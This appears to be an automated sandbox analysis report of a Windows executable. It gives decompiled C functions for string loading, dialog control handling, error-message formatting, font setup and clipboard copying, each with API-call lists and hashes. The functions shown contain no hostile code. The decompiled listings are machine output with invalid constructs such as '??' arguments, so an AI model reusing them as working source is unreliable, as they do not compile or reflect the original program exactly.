                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                				void* _t57;
                                                                                                                                                				int _t61;
                                                                                                                                                				void* _t62;
                                                                                                                                                				int _t71;
                                                                                                                                                				void* _t72;
                                                                                                                                                				void* _t73;
                                                                                                                                                
                                                                                                                                                 				// Looks up the id passed in __ebx: after lazily initialising via E00406785, it linearly
                                                                                                                                                 				// scans the table at 0x413278 (count at 0x413280, 0x18 entries) and, on a hit, points _t57
                                                                                                                                                 				// into the buffer at 0x413270 using the offset table at 0x41327c (index scaled by 2).
                                                                                                                                                 				_t39 = __ebx;
                                                                                                                                                 				if( *0x413288 == 0) {
                                                                                                                                                					E00406785();
                                                                                                                                                				}
                                                                                                                                                				_t40 =  *0x413280; // 0x18
                                                                                                                                                				_t21 = 0;
                                                                                                                                                				if(_t40 <= 0) {
                                                                                                                                                					L5:
                                                                                                                                                					_t57 = 0;
                                                                                                                                                				} else {
                                                                                                                                                					while(1) {
                                                                                                                                                						_t55 =  *0x413278; // 0xb17090
                                                                                                                                                						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
                                                                                                                                                							break;
						}
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t52 =  *0x41327c; // 0xb17498
					_t53 =  *0x413270; // 0xa10048
					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x412c38 == 0) {
							_t23 =  *0x413290; // 0x1000
							_push(_t23 - 1);
							_push( *0x413274);
							_push(_t39);
							_t25 = E0040698D();
							goto L15;
						} else {
							wcscpy(0x412e48, L"strings");
							_t35 = E00406D16(_t39,  *0x413274);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_t46 =  *0x413290; // 0x1000
								_push(_t46 - 1);
								_push( *0x413274);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x413274);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_t49 =  *0x413290; // 0x1000
						_push(_t49 - 1);
						_push( *0x413274);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40f454;
					} else {
						_t27 =  *0x413284; // 0xcd
						_t10 = _t61 + 2; // 0xcf
						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
						if(_t72 >= 0) {
							goto L20;
						} else {
							_t42 =  *0x413280; // 0x18
							_t73 = _t42 -  *0x41328c; // 0x100
							if(_t73 >= 0) {
								goto L20;
							} else {
								_t43 =  *0x413270; // 0xa10048
								_t57 = _t43 + _t27 * 2;
								_t14 = _t61 + 2; // 0x2
								memcpy(_t57,  *0x413274, _t61 + _t14);
								_t30 =  *0x413280; // 0x18
								_t44 =  *0x413284; // 0xcd
								_t54 =  *0x41327c; // 0xb17498
								 *(_t54 + _t30 * 4) = _t44;
								_t31 =  *0x413280; // 0x18
								_t45 =  *0x413278; // 0xb17090
								 *(_t45 + _t31 * 4) = _t39;
								_t32 =  *0x413284; // 0xcd
								 *0x413280 =  *0x413280 + 1;
								 *0x413284 = _t32 + _t61 + 1;
								if(_t57 != 0) {
									goto L21;
								} else {
									goto L20;
								}
							}
						}
					}
				}
				return _t22;
			}

APIs
• GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
• wcscpy.MSVCRT ref: 004068A8
  • Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
  • Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37
• wcslen.MSVCRT ref: 004068C6
• GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
• LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
• memcpy.MSVCRT ref: 0040693F
  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 79%
E00406050(short* __ebx, intOrPtr _a4) {
    int _v8;
    char _v12;
    void _v2058;
    void _v2060;
    int _t35;
    int _t41;
    signed int _t48;
    signed int _t49;
    signed short* _t50;
    void** _t52;
    void* _t53;
    void* _t54;

    _t48 = 0;
    _v2060 = 0;
    memset( &_v2058, 0, 0x7fe);
    _t54 = _t53 + 0xc;
    *__ebx = 0;
    _t52 = _a4 + 4;
    _v12 = 8;
    /* loop over 8 name/value string pairs, writing "name (value)" followed by the value into the output buffer */
    do {
        _push( *_t52);
        _push( *((intOrPtr*)(_t52 - 4)));
        _push(L"%s (%s)");
        _push(0x400);
        _push( &_v2060);
        L0040DFD6(); /* unresolved call; the API ID list for this function names _snwprintf */
        _t35 = wcslen( &_v2060);
        _v8 = _t35;
        memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
        _t49 = _t48 + _v8 + 1;
        _t41 = wcslen( *_t52);
        _v8 = _t41;
        memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
        _t54 = _t54 + 0x34;
        _t52 =  &(_t52[2]);
        _t23 =  &_v12;
        *_t23 = _v12 - 1;
        _t48 = _t49 + _v8 + 1;
    } while ( *_t23 != 0);
    /* terminate the multi-string buffer with a double null */
    _t50 = __ebx + _t48 * 2;
    *_t50 =  *_t50 & 0x00000000;
    _t50[1] = _t50[1] & 0x00000000;
    return __ebx;
}

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)
• API String ID: 3979103747-1363028141
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 78%
E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
    void _v514;
    short _v516;
    void _v8710;
    short _v8712;
    int _t17;
    WCHAR* _t26;

    E0040E340(0x2204, __ecx);
    _v8712 = 0;
    memset( &_v8710, 0, 0x2000);
    _t17 = GetDlgCtrlID(_a4);
    _t34 = _t17;
    GetWindowTextW(_a4,  &_v8712, 0x1000);
    /* only controls with a positive ID and non-empty text are considered */
    if(_t17 > 0 && _v8712 != 0) {
        _v516 = 0;
        memset( &_v514, 0, 0x1fe);
        GetClassNameW(_a4,  &_v516, 0xff);
        _t26 =  &_v516;
        _push(L"sysdatetimepick32");
        _push(_t26);
        L0040E03E(); /* unresolved call; the API ID list for this function names _wcsicmp */
        /* class name differs from "sysdatetimepick32": hand the control ID and text to E00406E5E */
        if(_t26 != 0) {
            E00406E5E(_t34,  &_v8712);
        }
    }
    return 1;
}

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 68%
			E004052B3(long __edi, wchar_t* _a4) {
				wchar_t* _v8;        // LPWSTR filled in by FormatMessageW; the decompiler typed it as short
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;        // Win32 / NetAPI error code to translate into text
				_t8 = 0;
				_t14 = 0x1100;       // FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER
				if(__edi - 0x834 <= 0x383) {
					// Unsigned range check: NERR_BASE (2100) .. MAX_NERR (2999), whose text lives in netmsg.dll
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);   // 2 = LOAD_LIBRARY_AS_DATAFILE
					if(_t8 != 0) {   // the decompiler emitted the constant test "0 != 0" here; the jump is on the module handle
						_t14 = 0x1900;   // additionally FORMAT_MESSAGE_FROM_HMODULE
					}
				}
				// nSize = 0x400 is the minimum size of the buffer FormatMessageW allocates with LocalAlloc
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40f454);   // fallback string constant in .rdata
				} else {
					// The caller's buffer is assumed to hold 0x400 wide chars; longer messages are silently dropped
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

Instruction addresses of the statements above, in order: 0x004052b3, 0x004052c1, 0x004052c9, 0x004052ce, 0x004052d8, 0x004052e0, 0x004052e2, 0x004052e2, 0x004052e0, 0x004052fe, 0x0040532d, 0x00405300, 0x0040530b, 0x00405313, 0x00405319, 0x0040531d, 0x0040531d, 0x00405337

APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
• wcslen.MSVCRT ref: 00405303
• wcscpy.MSVCRT ref: 00405313
• LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
• wcscpy.MSVCRT ref: 0040532D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: netmsg.dll
• API String ID: 2767993716-3706735626
• Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
• Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
• Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
• Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E0040103E(void* __esi, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTW _v100;
				signed int _t14;
				int _t21;
				long _t22;
				signed int _t25;
				struct HDC__* _t27;
				intOrPtr _t33;

				_t27 = GetDC(0);
				_t14 = GetDeviceCaps(_t27, 0x5a);   // 0x5a = LOGPIXELSY (vertical screen DPI)
				_t25 = 0x60;                        // 96 = reference DPI
				asm("cdq");
				_v8 = _t14 * 0xe / _t25;            // scale a 14-pixel font height to the current DPI
				ReleaseDC(0, _t27);
				E00405833( &_v100, L"MS Sans Serif", _v8, 1);   // fills the LOGFONTW (memset + wcscpy, see subcalls)
				_t21 = CreateFontIndirectW( &_v100);
				 *(__esi + 0x43c) = _t21;           // cache the HFONT in the object at __esi
				// 0x30 = WM_SETFONT; 0x3ec / 0x3ee are dialog control IDs 1004 / 1006; *(__esi + 0x10) is the dialog HWND
				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
				_t33 =  *0x412fd0; // 0x0 (global flag in .data; the second control only receives the font when it is set)
				if(_t33 != 0) {
					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
				}
				return _t22;
			}

Instruction addresses of the statements above, in order: 0x0040104f, 0x00401054, 0x0040105f, 0x00401060, 0x00401065, 0x00401068, 0x0040107b, 0x00401087, 0x0040109f, 0x004010a5, 0x004010a7, 0x004010ae, 0x00000000, 0x004010c1, 0x004010c6

APIs
• GetDC.USER32(00000000), ref: 00401049
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
• ReleaseDC.USER32 ref: 00401068
  • Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
  • Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D
• CreateFontIndirectW.GDI32(?), ref: 00401087
• SendDlgItemMessageW.USER32 ref: 004010A5
• SendDlgItemMessageW.USER32 ref: 004010C1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
• String ID: MS Sans Serif
• API String ID: 1274520933-168460110
• Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
• Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
• Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
• Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t77;
				signed int _t91;
				signed int _t92;
				void* _t100;
				void* _t104;
				short* _t122;
				unsigned int _t128;
				intOrPtr _t131;
				signed int _t134;
				void* _t149;
				void* _t150;
				intOrPtr* _t151;
				short _t157;
				signed int _t158;

				_t132 = __ecx;
				_t75 = _a4 - 0x4e;          // _a4 is the window message; 0x4e = WM_NOTIFY
				_t158 = __ecx;
				if(_t75 == 0) {
					_t151 = _a12;           // lParam: NMHDR* (hwndFrom @ +0, idFrom @ +4, code @ +8)
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {   // code == NM_DBLCLK (-3)
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if(__eflags == 0) {                          // idFrom == 1001
							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));   // hwndFrom, iItem (offset 0xc)
						}
					}
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {   // code != LVN_ITEMCHANGED (-101)
						L27:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {    // only the list-view with control ID 1001
							goto L27;
						}
						_t77 =  *(_t151 + 0x14);                      // NMLISTVIEW.uNewState
						__eflags = _t77 & 0x00000002;                 // LVIS_SELECTED
						if((_t77 & 0x00000002) == 0) {
							L36:
							_t134 =  *(_t151 + 0x18) ^ _t77;          // uOldState ^ uNewState: which state bits changed
							__eflags = 0x0000f000 & _t134;            // LVIS_STATEIMAGEMASK: did the checkbox state image change?
							if((0x0000f000 & _t134) == 0) {
								L39:
								__eflags =  *(_t151 + 0x14) & 0x00000002;
								if(( *(_t151 + 0x14) & 0x00000002) == 0) {   // item not selected in the new state
									goto L27;
								}
								__eflags =  *(_t151 + 0x18) & 0x00000002;
								if(( *(_t151 + 0x18) & 0x00000002) != 0) {   // item was already selected in the old state
                                                                                                                                                									goto L27;
                                                                                                                                                								}
                                                                                                                                                								__eflags =  *(_t151 + 0xc);
                                                                                                                                                								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
                                                                                                                                                								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
                                                                                                                                                								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
                                                                                                                                                								 *((intOrPtr*)(_t158 + 0x48)) = 1;
                                                                                                                                                								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
                                                                                                                                                								 *((intOrPtr*)(_t158 + 0x48)) = 0;
                                                                                                                                                								return 1;
                                                                                                                                                							}
                                                                                                                                                							L37:
                                                                                                                                                							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
                                                                                                                                                							__eflags = _t91 & 0x00000002;
                                                                                                                                                							if((_t91 & 0x00000002) != 0) {
                                                                                                                                                								_t92 = _t91 & 0x0000f000;
                                                                                                                                                								__eflags = _t92 - 0x1000;
                                                                                                                                                								_a8 = _t92;
                                                                                                                                                								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
                                                                                                                                                								_a8 - 0x2000 = _a8 == 0x2000;
                                                                                                                                                								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
                                                                                                                                                							}
                                                                                                                                                							goto L39;
                                                                                                                                                						}
                                                                                                                                                						__eflags =  *(_t151 + 0x18) & 0x00000002;
                                                                                                                                                						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
                                                                                                                                                							goto L37;
                                                                                                                                                						}
                                                                                                                                                						goto L36;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t100 = _t75 - 0xc2;
                                                                                                                                                				if(_t100 == 0) {
                                                                                                                                                					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
                                                                                                                                                					E004031BE(_t158);
                                                                                                                                                					E00405B17(_t149,  *(_t158 + 0x10), 0);
                                                                                                                                                					goto L27;
                                                                                                                                                				}
                                                                                                                                                				_t104 = _t100 - 1;
                                                                                                                                                				if(_t104 != 0) {
                                                                                                                                                					goto L27;
                                                                                                                                                				}
                                                                                                                                                				_t128 = _a8 >> 0x10;
                                                                                                                                                				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
                                                                                                                                                					L7:
                                                                                                                                                					if(_t128 != 0) {
                                                                                                                                                						goto L27;
                                                                                                                                                					}
                                                                                                                                                					if(_a8 != 0x3f0) {
                                                                                                                                                						L13:
                                                                                                                                                						if(_a8 == 0x3eb) {
                                                                                                                                                							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
                                                                                                                                                						}
                                                                                                                                                						if(_a8 == 0x3ec) {
                                                                                                                                                							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
                                                                                                                                                						}
                                                                                                                                                						if(_a8 == 0x3ee) {
                                                                                                                                                							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
                                                                                                                                                						}
                                                                                                                                                						if(_a8 == 0x3ef) {
                                                                                                                                                							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
                                                                                                                                                						}
                                                                                                                                                						if(_a8 == 2) {
                                                                                                                                                							EndDialog( *(_t158 + 0x10), 2);
                                                                                                                                                						}
                                                                                                                                                						if(_a8 == 1) {
                                                                                                                                                							E0040314A(_t158);
                                                                                                                                                							EndDialog( *(_t158 + 0x10), 1);
                                                                                                                                                						}
                                                                                                                                                						return 1;
                                                                                                                                                					}
                                                                                                                                                					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
                                                                                                                                                					_t132 = 0;
                                                                                                                                                					if(_t131 <= 0) {
                                                                                                                                                						L12:
                                                                                                                                                						E004031BE(_t158);
                                                                                                                                                						goto L13;
                                                                                                                                                					}
                                                                                                                                                					_t150 = 0;
                                                                                                                                                					do {
                                                                                                                                                						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
                                                                                                                                                						 *(_t122 + 2) = _t132;
                                                                                                                                                						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
                                                                                                                                                						_t132 = _t132 + 1;
                                                                                                                                                						_t150 = _t150 + 0x14;
                                                                                                                                                						 *_t122 = _t157;
                                                                                                                                                					} while (_t132 < _t131);
                                                                                                                                                					goto L12;
                                                                                                                                                				} else {
                                                                                                                                                					if(_a8 != 0x3ed) {
                                                                                                                                                						goto L27;
                                                                                                                                                					} else {
                                                                                                                                                						E004030F2(__ecx, __ecx);
                                                                                                                                                						goto L7;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}
                                                                                                                                                0x0040342c
                                                                                                                                                0x00403433
                                                                                                                                                0x00403433
                                                                                                                                                0x0040343a
                                                                                                                                                0x0040343e
                                                                                                                                                0x00403448
                                                                                                                                                0x00403448
                                                                                                                                                0x00000000
                                                                                                                                                0x0040344c
                                                                                                                                                0x00403390
                                                                                                                                                0x00403393
                                                                                                                                                0x00403397
                                                                                                                                                0x004033ba
                                                                                                                                                0x004033bb
                                                                                                                                                0x00000000
                                                                                                                                                0x004033bb
                                                                                                                                                0x00403399
                                                                                                                                                0x0040339b
                                                                                                                                                0x004033a0
                                                                                                                                                0x004033a3
                                                                                                                                                0x004033aa
                                                                                                                                                0x004033af
                                                                                                                                                0x004033b0
                                                                                                                                                0x004033b5
                                                                                                                                                0x004033b5
                                                                                                                                                0x00000000
                                                                                                                                                0x0040336b
                                                                                                                                                0x00403371
                                                                                                                                                0x00000000
                                                                                                                                                0x00403377
                                                                                                                                                0x00403377
                                                                                                                                                0x00000000
                                                                                                                                                0x00403377
                                                                                                                                                0x00403371

APIs
• GetDlgItem.USER32 ref: 004033D7
• GetDlgItem.USER32 ref: 004033EA
• GetDlgItem.USER32 ref: 004033FF
• GetDlgItem.USER32 ref: 00403417
• EndDialog.USER32(?,00000002), ref: 00403433
• EndDialog.USER32(?,00000001), ref: 00403448
  • Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
  • Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114
• SendDlgItemMessageW.USER32 ref: 00403460
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
• Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
• Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
• Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
• Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
	RECT* _v8;
	void* __esi;
	void* _t39;
	signed int _t41;
	void* _t42;
	struct HWND__* _t47;
	signed int _t53;
	void* _t54;
	signed int _t74;
	signed int _t76;
	void* _t78;
	void** _t80;
	signed int _t84;
	void* _t88;
	signed int _t89;

	_t78 = __edi;
	_push(0xc);
	_v8 = 0;
	 *((intOrPtr*)(__edi + 0x44)) = __eax;
	L0040E038();
	if(__eax == 0) {
		_t80 = 0;
	} else {
		 *((intOrPtr*)(__eax)) = 0;
		_t80 = __eax;
	}
	 *(_t78 + 0x40) = _t80;
	_t39 =  *_t80;
	_t88 = _t39;
	if(_t88 != 0) {
		_push(_t39);
		L0040E032();
		 *_t80 = 0;
	}
	_t80[2] = _a8;
	_t41 = E0040299A(_a8);
	_t74 = 4;
	_t80[1] = _t41;
	_t42 = _t41 * _t74;
	_push( ~(0 | _t88 > 0x00000000) | _t42);
	L0040E038();
	 *_t80 = _t42;
	memset(_t42, 0, _t80[1] << 2);
	E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
	_t89 =  *(_t78 + 0x44);
	if(_t89 == 0) {
		_t84 = ( *(_t78 + 0x40))[1];
		_t76 = 0x14;
		_t53 = _t84 * _t76;
		_push( ~(0 | _t89 > 0x00000000) | _t53);
		L0040E038();
		 *(_t78 + 0x44) = _t53;
		if(_t84 > 0) {
			_t54 = 0;
			do {
				 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
				_t54 = _t54 + 0x14;
				_t84 = _t84 - 1;
			} while (_t84 != 0);
		}
		_v8 = 1;
	}
	if(E0040152F(0x448, _t78, _a4) == 1) {
		E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
		InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
	}
	_t47 = SetFocus(_a8);
	if(_v8 != 0) {
		_push( *(_t78 + 0x44));
		L0040E032();
		return _t47;
	}
	return _t47;
}
                                                                                                                                                0x00000000
                                                                                                                                                0x00403680
                                                                                                                                                0x00403682

APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: 0d7410a7d3b8ba2267d52b6ad2d59f04a83aa0d6c30b0f4fbf032bbb816a3573
• Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
• Opcode Fuzzy Hash: 0d7410a7d3b8ba2267d52b6ad2d59f04a83aa0d6c30b0f4fbf032bbb816a3573
• Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E004054F1(void* _a4) {
				int _t3;
				int _t7;
				signed int _t12;
				int _t14;
				void* _t18;
				signed int _t20;
				void* _t23;

				_t23 = _a4;   /* wide (UTF-16) string to place on the clipboard */
				_t20 = 0;     /* result: 0 on failure, 1 on success */
				EmptyClipboard();
				if(_t23 != 0) {
					_t7 = wcslen(_t23);
					_t3 = _t7 + 2; // 0x2
					_t14 = _t7 + _t3;   /* buffer size in bytes: 2 * len + 2 (terminating NUL) */
					_t18 = GlobalAlloc(0x2000, _t14);   /* 0x2000 = GMEM_DDESHARE */
					if(_t18 != 0) {
						memcpy(GlobalLock(_t18), _t23, _t14);
						GlobalUnlock(_t18);
						_t12 = SetClipboardData(0xd, _t18);   /* 0xd = CF_UNICODETEXT */
						asm("sbb esi, esi");
						_t20 =  ~( ~_t12);   /* neg/sbb/neg idiom: 1 if the handle was accepted, else 0 */
					}
				}
				CloseClipboard();
				return _t20;
			}

APIs
• EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
• wcslen.MSVCRT ref: 00405506
• GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
• GlobalLock.KERNEL32 ref: 00405523
• memcpy.MSVCRT ref: 0040552C
• GlobalUnlock.KERNEL32(00000000), ref: 00405535
• SetClipboardData.USER32 ref: 0040553E
• CloseClipboard.USER32 ref: 0040554E
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
